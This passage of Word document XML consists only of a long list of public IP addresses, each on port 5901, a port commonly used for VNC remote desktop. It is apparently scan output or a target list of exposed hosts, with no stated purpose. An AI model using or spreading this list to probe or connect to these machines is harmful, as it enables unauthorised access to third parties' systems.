        <w:t xml:space="preserve">222.185.246.100:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.189.31.27:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.189.31.30:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.199.186.210:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.218.130.40:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.240.194.57:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.242.199.206:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">223.255.183.122:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.248.0.7:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.248.0.10:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.248.0.13:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.248.0.11:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.248.0.8:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.248.1.7:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.2:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.9:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">36.250.90.7:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.4:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.5:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.8:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.3:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.6:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.10:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">42.51.3.67:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.16.50.148:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.16.50.150:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.16.50.149:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.16.252.75:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.16.18.71:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.17.39.132:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.18.177.91:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.22.99.20:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.22.99.18:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.22.99.30:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.83.169.196:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.83.169.199:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.83.169.180:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.83.174.182:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">58.240.63.112:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.240.60.76:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.240.60.74:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.242.49.194:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.246.22.54:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.243.150.12:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.246.226.116:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.250.160.26:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.250.162.17:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.251.79.200:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.251.159.95:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.251.50.155:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.251.50.156:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.251.129.36:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.251.129.37:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.254.132.22:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">59.38.32.146:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.13.127.2:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.13.127.3:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.13.165.18:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.18.146.50:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.13.124.154:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">60.13.124.153:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.19.28.137:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.28.140.34:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.28.203.123:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.28.203.124:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.28.203.122:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.30.77.22:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.210.32.254:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.210.32.253:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.211.204.92:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.211.204.91:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.215.129.45:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.215.129.44:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.50.247.176:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.50.254.111:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.50.254.151:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.50.254.177:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.50.254.152:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.55.143.210:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.128.111.238:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.49.19.182:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.132.101.75:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">60.220.225.42:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.135.24.91:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.135.203.173:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.136.170.6:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.136.170.8:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.136.170.9:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.137.117.18:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.139.76.165:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.139.76.166:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.145.229.68:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.149.52.52:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.156.156.12:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.159.149.206:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.162.184.142:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.172.251.195:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.172.254.131:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.180.25.21:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.180.25.20:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.182.170.35:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.182.170.38:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.182.170.33:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">61.180.25.18:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.180.113.129:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.183.49.3:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.183.214.5:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.182.231.134:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.233.79.12:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.233.79.14:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">101.66.249.14:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">101.66.249.16:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">101.66.249.15:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">101.66.249.17:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">101.66.249.36:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">101.66.249.38:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">101.66.249.43:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">101.66.249.69:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">101.66.249.62:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">101.66.249.117:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">101.66.249.67:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">101.66.249.120:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">101.66.249.108:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">101.66.249.107:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">101.66.249.118:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">101.66.249.106:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">101.66.249.119:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">101.66.249.159:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">103.246.217.12:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.52.11.208:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.2:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.6:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.15:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.9:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.20:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.29:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.38:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.43:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.45:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.48:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.57:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.63:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.3:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.5:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.74:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.78:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.23:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
